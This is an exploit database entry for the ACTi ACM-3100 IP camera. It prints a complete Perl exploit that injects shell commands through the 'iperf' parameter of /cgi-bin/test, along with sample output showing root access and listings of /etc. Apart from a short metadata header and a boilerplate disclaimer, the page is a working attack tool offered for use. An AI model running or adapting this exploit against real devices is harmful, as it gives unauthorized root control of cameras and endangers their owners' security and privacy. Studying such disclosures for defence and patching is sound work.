ACTi ACM-3100 Camera Remote Command Execution

2019.09.26
Credit: Todor Donev
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-78

#!/usr/bin/perl # # ACTi ACM-3100 Camera Remote Command Execution Exploit # # Copyright 2019 (c) Todor Donev <todor.donev at gmail.com> # # # Disclaimer: # This or previous programs are for Educational purpose ONLY. Do not use it without permission. # The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages # caused by direct or indirect use of the information or functionality provided by these programs. # The author or any Internet provider bears NO responsibility for content or misuse of these programs # or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss, # system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's # responsibility. # # Use them at your own risk! # # (Dont do anything without permissions) # # # [test@localhost acti]$ perl actiroot.pl 192.168.1.1 # # [ ACTi ACM-3100 Camera Remote Command Execution Exploit # # [ ========================================================= # # [ Exploit author: Todor Donev 2019 <todor.donev@gmail.com> # # # id # # execute : /sbin/iperf -c ;id & # # uid=0(root) gid=0(root) # # # ls -la # # execute : /sbin/iperf -c ;ls -la & # # -rwxr-xr-x 1 0 0 14900 test # # -rwxr-xr-x 1 0 0 32028 80503736 # # -rwxr-xr-x 1 0 0 8872 macdev # # -rwxr-xr-x 1 0 0 29804 updatem # # -rwxr-xr-x 1 0 0 31788 update # # -rwxr-xr-x 1 0 0 28676 mpeg4 # # -rwxr-xr-x 1 0 0 137040 videoconfiguration.cgi # # lrwxrwxrwx 1 0 0 6 url.cgi -> system # # -rwxr-xr-x 1 0 0 27780 system # # drwxr-xr-x 2 0 0 1024 cmd # # drwxr-xr-x 5 0 0 1024 .. # # drw-r--r-- 3 0 0 1024 . # # # ls -la /etc/ # # execute : /sbin/iperf -c ;ls -la /etc/ & # # -rw-r--r-- 1 0 0 71 hosts # # drwxr-xr-x 3 0 0 1024 default # # drwxr-xr-x 2 0 0 1024 config # # -rwxr-xr-x 1 0 0 5834 protocols # # drwxr-xr-x 4 0 0 1024 ppp # # drwxr-xr-x 2 0 0 1024 dhcpc # # -rwxr-xr-x 1 0 0 211 inittab # # -rwxr-xr-x 1 0 0 26 host.conf # # -rwxr-xr-x 1 0 0 534 passwd # # -rwxr-xr-x 1 0 0 280 group # # drwxr-xr-x 2 0 0 1024 init.d # # -rwxr-xr-x 1 0 0 421 profile # # -rw-r--r-- 1 0 0 25 resolv.conf # # -rwxr-xr-x 1 0 0 10787 services # # drwxr-xr-x 2 0 0 1024 thttpd # # -rwxr-xr-x 1 0 0 251 fstab # # drwxr-xr-x 13 0 0 1024 .. # # drwxr-xr-x 8 0 0 1024 . # # # # # use LWP::Simple; print "[ ACTi ACM-3100 Camera Remote Command Execution Exploit [ ========================================================= [ Exploit author: Todor Donev 2019 <todor.donev\@gmail.com> "; if(not defined $ARGV[0]) { print "[ Usage: perl $0 [target]\n"; print "[ Example: perl $0 192.168.1.1\n\n"; exit; } my $host = $ARGV[0] =~ /^http:\/\// ? $ARGV[0]: 'http://' . $ARGV[0]; while(1) { print "\# "; chomp($cmd = <STDIN>); if($cmd eq "clear"){system $^O eq 'MSWin32' ? 'cls' : 'clear';} last if $cmd eq 'exit'; last if is_error(getprint($host."/cgi-bin/test?iperf=;${cmd}")); print $resp; }


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top